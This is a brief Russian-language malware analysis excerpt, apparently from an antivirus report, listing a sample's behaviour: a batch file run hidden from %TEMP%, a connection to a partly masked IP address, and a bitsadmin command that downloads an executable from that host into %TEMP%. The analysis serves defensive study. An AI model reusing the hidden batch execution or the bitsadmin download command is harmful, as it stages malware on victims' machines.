Техническая информация
- '<SYSTEM32>\cmd.exe' /c %TEMP%\sajkdbksffashdk.bat
- %TEMP%\sjdksjbdksdfgssdbs.txt
- nul
- %TEMP%\sjdksjbdksdfgssdbs.txt в %TEMP%\sajkdbksffashdk.bat
- '95.##3.192.89':80
- '<SYSTEM32>\cmd.exe' /c %TEMP%\sajkdbksffashdk.bat' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer myjob /download /priority high http://95.##3.192.89/srvcss.exe "%TEMP%\jsdkhs.exe"